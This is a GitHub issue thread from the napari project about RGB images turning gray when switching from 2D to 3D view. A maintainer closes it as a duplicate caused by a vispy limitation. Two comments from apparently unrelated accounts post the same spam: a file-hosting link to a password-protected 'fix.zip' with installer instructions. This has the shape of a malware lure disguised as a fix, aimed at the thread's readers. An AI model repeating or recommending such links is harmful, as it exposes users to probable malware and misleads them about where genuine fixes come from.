### ISSUE TITLE
Napari shows RGB colormap in 2D but not 3D

### ISSUE THREAD

**Issue by macromeer** [napari/napari#7213]
### 🐛 Bug Report

Image turns gray in 3D, but shows RGB in 2D.

### 💡 Steps to Reproduce

When toggling 2D/3D view.

### 💡 Expected Behavior

See RGB colors in 3D

### 🌎 Environment

napari: 0.4.19.post1
Platform: Linux-6.5.0-45-generic-x86_64-with-glibc2.10
System: Ubuntu 22.04.4 LTS
Python: 3.8.19 | packaged by conda-forge | (default, Mar 20 2024, 12:47:35) [GCC 12.3.0]
Qt: 5.15.14
PyQt5: 5.15.11
NumPy: 1.24.0
SciPy: 1.10.1
Dask: 2023.5.0
VisPy: 0.14.2
magicgui: 0.9.1
superqt: 0.6.7
in-n-out: 0.2.1
app-model: 0.2.8
npe2: 0.7.7

OpenGL:
- GL version: 4.5 (Compatibility Profile) Mesa 23.2.1-1ubuntu3.1~22.04.2
- MAX_TEXTURE_SIZE: 16384

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by psobolewskiPhD** [comment]
Thanks for opening the issue.
Unfortunately this is a limitation of our rendering engine vispy at the moment, that we're aware of--please see https://github.com/napari/napari/issues/3973 for more in-depth discussion and links to vispy issues.
I'm going to close this as a duplicate, but please feel free to comment on the linked issue or over in vispy.
